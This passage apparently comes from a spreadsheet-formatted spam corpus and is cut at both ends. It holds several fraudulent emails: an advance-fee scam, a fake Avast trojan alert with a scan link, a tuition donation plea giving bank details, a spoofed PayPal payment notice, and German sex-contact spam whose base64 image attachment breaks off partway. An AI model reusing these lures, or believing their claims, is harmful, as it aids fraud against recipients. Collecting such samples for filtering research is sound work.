the appropriate departments for necessary approvals in your favour before the transfer can be made. We shall be compensating you with a million dollars on final conclusion of this project, while the rest shall be for us. If this proposal is acceptable by you, please response immediately,\nI await your urgent response. \nRegards,\nMr. Peter Lang \n\n\n\n___________________________________________________________________________\nCe Message a �t� compos� avec le module WebMail du site "Le Trublion Picard"\n- [URL]http://www.letrublion.info[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.letrublion.info</t>
  </si>
  <si>
    <t>1160</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "AVAST" &lt;buroservice@t-online.de&gt;\nDate: Wed, 12 Feb 2020 10:07:28 -0800</t>
  </si>
  <si>
    <t>Wed, 12 Feb 2020 10:07:28 -0800</t>
  </si>
  <si>
    <t>"AVAST" &lt;buroservice@t-online.de&gt;</t>
  </si>
  <si>
    <t>Avast Internet Security Alert!!!</t>
  </si>
  <si>
    <t>Security Alert!!!     Dear User   Our spider detected 5 deadly trojans in your mailbox today. If left unchecked, this can lead to a total email shutdown or loss of important data.   To protect your email data, follow the URL below to scan your E-mail for free.   [URL]http://scan.avast.com[/URL]     *Note: This will serve as a final notification to this threat.   Source: Avast Internet Security    Security Alert!!!     Dear User   Our spider detected 5 deadly trojans in your mailbox today. If left unchecked, this can lead to a total email shutdown or loss of important data.   To protect your email data, follow the URL below to scan your E-mail for free.   [URL]http://scan.avast.com[/URL]     *Note: This will serve as a final notification to this threat.   Source: Avast Internet Security</t>
  </si>
  <si>
    <t>http://scan.avast.com http://scan.avast.com</t>
  </si>
  <si>
    <t>96</t>
  </si>
  <si>
    <t>To: webmaster@aclweb.org\nFrom: CYRIL AKWARANDU &lt;madu_invest@yahoo.com&gt;\nDate: Wed, 12 Feb 2003 06:09:44 +0100</t>
  </si>
  <si>
    <t>Wed, 12 Feb 2003 06:09:44 +0100</t>
  </si>
  <si>
    <t>CYRIL AKWARANDU &lt;madu_invest@yahoo.com&gt;</t>
  </si>
  <si>
    <t>PLEASE REPENT AND KNOW YOUR GOD/ ALSO ASSIST ME</t>
  </si>
  <si>
    <t>PLEASE COME AND HELP Before you read my message for which I am requesting for financial assistance to enrol at American Intercontinental University, I want to enjoin you  to surrender your life to Christ.  Please repent for the Kingdom of God is at hand. I will be sending you revelation messages a week later. Thanks and God bless. God bless you once again.  Amen -------------------------- DEAR SERVANTS OF GOD, I AM CYRIL AKWARANDU, I GAINED ADMISSION INTO AMERICAN INTERCONTINENTAL UNIVERSITY, LONDON BUT I HAVE NO MONEY TO PAY FOR THE TUITION FEE OF �3,670 AND I HAVE NO PERSON TO ASSIST ME.  AS A RESULT, MY ADMISSION WAS DEFARRED TO JANUARY 2003.  I HAVE BEEN INFORMED BY MY ADMISSION COUNSELLOR, THAT I NEED TO PAY FOR THE FEE IMMEDIATELY IN ORDER TO JOIN THE 2003 SESSION. ANY AMOUNT GOD LAIDS IN YOUR HEART, PLEASE ASSIST AND THE ALMIGHTY WILL REWARD YOU ABUNDANTLY. THIS AMOUNT CAN BE PAID STRAIGHT TO THE SCHOOLS ACCOUNT AS STATED BELOW AND A CONFIRMATION SENT TO ME VIA MY E-MAIL (cyakwarandu@hotmail.com) I HEREBY PLEAD WITH YOU TO COME TO MY AID WITH WHAT THE LORD LAIDS IN YOUR HEART.  I NEED TO PAY THE TUITION FEE AND I HAVE NO BODY EXCEPT GOD TO ASSIST IN THIS REGARD. GOD WILL BLESS YOU MORE AND MORE, IF YOU WOULD ALLOW YOURSELF USED TO HELP THE POOR OUT OF THE DUNGEON. GOD BLESS YOU. AMEN. DON'T BE WEARY IN WELL DOING FOR YOUR REWARD IS IN THE KINGDOM OF HEAVEN. The information above can be confirmed from American Intercontinental University, London and below is the Letter of Acceptance to me from the University. Congratulations again on you acceptance. As I mentioned you now need to pay your full fees now so that we can send you your visa letter. To make the payment your sponsor needs to go to his bank and get them to transfer �3,670.00 to our bank account. The bank details are as follows -  Bank address: National Westminster Bank Westminster Branch PO BOX 3038 London SW1H 0HN UK Account number: 48 20 22 31. Account name: The American European Corporation  Sort code: 56 00 33 Please fax a statement from the bank, showing that this transfer has been made, and including the student name on the fax.  The fax number is at the bottom of this message. As I mentioned earlier I will be leaving the University on Monday. Your new admissions officer is going to be Amer Mourad and you can contact him by phone on +44 207 467 5645 or by email on amourad@aiulondon.ac.uk  Best regards Anna Davison ********************************** Anna Davison Admissions Officer AIU - London 110 Marylebone High Street London W1U 4RY Tel: +44 (0) 207 467 2441 Fax: +44 (0) 207 467 5641 email: adavison@aiulondon.ac.uk  [URL]www.aiulondon.ac.uk[/URL]</t>
  </si>
  <si>
    <t>www.aiulondon.ac.uk</t>
  </si>
  <si>
    <t>925</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: PayPal &lt;mail@paypal.com&gt; &lt;s.schweiger@alliance-construction.us&gt;\nDate: Wed, 12 Dec 2018 16:01:41 -0300</t>
  </si>
  <si>
    <t>Wed, 12 Dec 2018 16:01:41 -0300</t>
  </si>
  <si>
    <t>PayPal &lt;mail@paypal.com&gt; &lt;s.schweiger@alliance-construction.us&gt;</t>
  </si>
  <si>
    <t>You received a PayPal payment</t>
  </si>
  <si>
    <t>PayPal payment Dec 12, 2018  Transaction ID:  65207375NK089996O       Dec 12, 2018 Transaction ID: 65207375NK089996O     HelloYou received a payment of $83.15 USDThanks for using PayPal. To see all the transaction details, download your PayPal Transaction details file: Download transaction details online-fileIt may take a few moments for this transaction to appear in your account.Seller Protection - Eligible Questions? Go to the Help Center at: [URL]www.paypal.com[/URL] .Please do not reply to this email. This mailbox is not monitored and you will not receive a response. For assistance, log in to your PayPal account and click Help in the top right corner of any PayPal page.You can receive plain text emails instead of HTML emails. To change your Notifications preferences, log in to your account, go to your Profile, and click My settings.     Copyright © 1999-2018 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.PayPal PPX000900:7.2:64o2hq2a2g2m1</t>
  </si>
  <si>
    <t>www.paypal.com</t>
  </si>
  <si>
    <t>4396</t>
  </si>
  <si>
    <t>To: &lt;ler@lerctr.org&gt;\nFrom: K1-Sexkontaktmagazin &lt;news@k1-web.com&gt;\nDate: Wed, 11 Sep 2002 20:06:00 +0100</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 20:06:00 +0100</t>
  </si>
  <si>
    <t>K1-Sexkontaktmagazin &lt;news@k1-web.com&gt;</t>
  </si>
  <si>
    <t>&lt;ler@lerctr.org&gt;</t>
  </si>
  <si>
    <t>Sexabenteuer gefllig?</t>
  </si>
  <si>
    <t>This is a Multipart MIME message. Since your mail reader\ndoes not understand this format, some or all of\nthis message may not be legible.\n\n--XXB57D906D-3535B57DXX\nContent-Type: text/plain;\n	charset=iso-8859-1\nContent-Transfer-Encoding: 7bit\n\nDu suchst ein Sexabenteuer, Seitensprung, One-Night-Stand?\nWir helfen Dir dabei!\nIm Internet [URL]http://www.k1-web.com[/URL]\noder im monatlich erscheinenden Farbmagazin mit \nhunderten privaten Sexkontakten und heien, \nspritzigen Stories.\nbrigens, K1-Das Sexkontaktmagazin \n[URL]http://www.k1-web.com[/URL] Ausgabe Nr. 66 \nist jetzt im Handel erhltlich.\n\nSolltest Du an unserem Newsletter kein Interesse\nmehr haben, dann trage Dich bitte aus unter:\n[URL]http://www.k1-web.com[/URL]\n\n--XXB57D906D-3535B57DXX\nContent-Type: image/jpeg\nContent-Transfer-Encoding: base64\nContent-Disposition: attachment; filename="K1 Titelseite 66-Internet.jpg"\n\n/9j/4AAQSkZJRgABAgEASABIAAD/7RoiUGhvdG9zaG9wIDMuMAA4QklNA+kKUHJpbnQgSW5m\nbwAAAAB4AAMAAABIAEgAAAAAAw0CGv/i/+MDLAI2A0cFewPgAAIAAABIAEgAAAAAAw0CGgAB\nAAAAZAAAAAEAAwMDAP8AAScPAAEAAQAAAAAAAAAAAAAAAGAIABkBkAAAAAAAAAAAAAAAAAAA\nAAEAAAAAAAAAAAAAAAAAAAAAOEJJTQPtClJlc29sdXRpb24AAAAAEABIAAAAAQACAEgAAAAB\nAAI4QklNBA0YRlggR2xvYmFsIExpZ2h0aW5nIEFuZ2xlAAAAAAQAAAAeOEJJTQQZEkZYIEds\nb2JhbCBBbHRpdHVkZQAAAAAEAAAAHjhCSU0D8wtQcmludCBGbGFncwAAAAkAAAAAAAAAAAEA\nOEJJTQQKDkNvcHlyaWdodCBGbGFnAAAAAAEAADhCSU0nEBRKYXBhbmVzZSBQcmludCBGbGFn\ncwAAAAAKAAEAAAAAAAAAAjhCSU0D9RdDb2xvciBIYWxmdG9uZSBTZXR0aW5ncwAAAEgAL2Zm\nAAEAbGZmAAYAAAAAAAEAL2ZmAAEAoZmaAAYAAAAAAAEAMgAAAAEAWgAAAAYAAAAAAAEANQAA\nAAEALQAAAAYAAAAAAAE4QklNA/gXQ29sb3IgVHJhbnNmZXIgU2V0dGluZ3MAAABwAAD/////\n////////////////////////A+gAAAAA/////////////////////////////wPoAAAAAP//\n//////////////////////////8D6AAAAAD/////////////////////////////A+gAADhC\nSU0ECAZHdWlkZXMAAAAAEAAAAAEAAAJAAAACQAAAAAA4QklNBB4NVVJMIG92ZXJyaWRlcwAA\nAAQAAAAAOEJJTQQaBlNsaWNlcwAAAACBAAAABgAAAAAAAAAAAAAB3QAAAVQAAAAQAEsAMQAg\nAFQAaQB0AGUAbABzAGUAaQB0AGUAIAA2ADYAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAA\nAAAAAAAAAVQAAAHdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhCSU0EFBdM\nYXllciBJRCBHZW5lcmF0b3IgQmFzZQAAAAQAAAABOEJJTQQMFU5ldyBXaW5kb3dzIFRodW1i\nbmFpbAAAFf0AAAABAAAAUAAAAHAAAADwAABpAAAAFeEAGAAB/9j/4AAQSkZJRgABAgEASABI\nAAD/7gAOQWRvYmUAZIAAAAAB/9sAhAAMCAgICQgMCQkMEQsKCxEVDwwMDxUYExMVExMYEQwM\nDAwMDBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMAQ0LCw0ODRAODhAUDg4OFBQODg4O\nFBEMDAwMDBERDAwMDAwMEQwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAz/wAARCABwAFAD\nASIAAhEBAxEB/90ABAAF/8QBPwAAAQUBAQEBAQEAAAAAAAAAAwABAgQFBgcICQoLAQABBQEB\nAQEBAQAAAAAAAAABAAIDBAUGBwgJCgsQAAEEAQMCBAIFBwYIBQMMMwEAAhEDBCESMQVBUWET\nInGBMgYUkaGxQiMkFVLBYjM0coLRQwclklPw4fFjczUWorKDJkSTVGRFwqN0NhfSVeJl8rOE\nw9N14/NGJ5SkhbSVxNTk9KW1xdXl9VZmdoaWprbG1ub2N0dXZ3eHl6e3x9fn9xEAAgIBAgQE\nAwQFBgcHBgU1AQACEQMhMRIEQVFhcSITBTKBkRShsUIjwVLR8DMkYuFygpJDUxVjczTxJQYW\norKDByY1wtJEk1SjF2RFVTZ0ZeLys4TD03Xj80aUpIW0lcTU5PSltcXV5fVWZnaGlqa2xtbm\n9ic3R1dnd4eXp7fH/9oADAMBAAIRAxEAPwDicN7j0gbnE/orRqTwA8BDy+l9MrNj6RZscHCi\ns3Pe4EOroabXfsyhj/Ussfayv9Xs9Kr0vZd9n+0X/q9b6WCHenXaTU9oFzG2AbrNr3NrtDq9\n+z9H72fQf/bXRCro9WNQ3I6eLcy+h1zhTRhxzb6LG0PxDY91lddT9nrfpfV9ipTzCEiNdZH5\nXd5jlJ5+X5fJY4YYo7y1/mozlP5J+mPC8B+yneoGi9haXFpsDLiGtDtjL3D0PU9G36Veyvf+\n/XvVpnTcEBlbm232tO259byxpcQHBlddmI/IY6ne1t3qV/TZZ6S7cs+r1LHMuxa8h1LQ2/Io\now2VOvIe4YuKx2Hc6/3s9Nj/AFf0np35v6DFp9VEso+ruLcMPK6e52XWRXb6eNhMYXj22Po3\n4jrHVOfv9Hf+YhLm43R4r8B9vyf3mr/oyYJAo0OKWsvk/wALF6GX1Cw7Mj6s4uzg3XtJPAks\n2z/6T/nV32FRTi0CtpHq6mx886+3e/6X9hv+EXIfUDNvtsyabK62immqyquqtlbKnWOezJ9I\nVMbXX6rW+7bT6ty2XdZacy7HNJccZoc4V2Bw3WT6DHe31PXs27n/AE6Kcb9K+7/AW28/PyOO\nGOPpAGrQh8I9rmc3FU5iX6O36zhybT4Zfp8LqW9Tpx67si69ldOMA65xLnFkxtZ6dX+Gfuay\nundvs/0S806ni2V3WZWP0avAwnl1hxnV03upkl7nWTj/AKCl307cbfb+zn7/APtL+jxuk6sz\nreU7FrqNbqK3B19UOpfS/Vrs+jNYWN9Vm97qn+l/1vJT5HUsQ5j2Y1732Y72Mvy9uyttxAJ3\nvr3V4/0v8J+i9RUvckQADd/N4Olgxxxz4jEEi6jMcWOX0/rf+w3l8jHZQDYzHx8ii3aMe70M\netm47HuGSRVb6dlVZd62Pv8A+E/o/vsrdSZj1dPvHo0Nv9Oxssx6Cx3s3PfVeyv2W4/qMpt9\nD2fzN+PauozuhX9LxmdZw6Bf0y5of1DpjS4MY33bLm11/wDabY/1v/NVd+mq/UP6HzvVTmU9\nHuqreL8B1Tqm5Qa6S1gc+vDLrHObjbHM9V2Ls9b2Y/6ezBrxkiMnFAgmiQT6pfL/AM7/ABf/\nAEds1DL6scYVE1kFY4G48UeH5OD97/zo/nuX9ueL2+X/AP/QxvqHRiuxn35jA/Hrq9Lc9r3t\nbZfe3HY8MqZd6l/puu+y1en/AEj0/wDja9bLrczqv2ysOw6XU0sxnMO8VvdXj4PpC2wb3fYr\n8hvr27PtHps9ev8ASemsv6kZzqMHDracZjftFj7XZLiBENqqcPSY/Iqur3W/ZMnH/mrPU3q9\n12j6w32W4GPXVdfXkh2yBj1AXixzcar7XZjX7GP99GL+fbZdf+n9P11Rz4b45SlGA19c/wDN\nk+u+L9X/ACxu9jnkhGErPDLBjhqJZIjFwQ4yIfv/ANX+u5lpL8fHc0+2ndU+sR7XuJu9b979\nbra2r+R+z6/Us/T49at5Pp41lNVDRWcLA30Boj9M6p+fX7R/3cylI9E+ueWLG3txmeqQbXne\n8FzH+pFtuHXd/N5GPus3P/nWIGZj9abXazK6v0n2saX+pkPFr/SLXsq/SMZk2+6ir6Xss/Rq\npx45ER9yB+bSEuP+c/S9Mfm9WVMuejwTiQI8fu0Ze7eP7x80o8eGHucE5Zf3P3Ha+pWU3Fs6\n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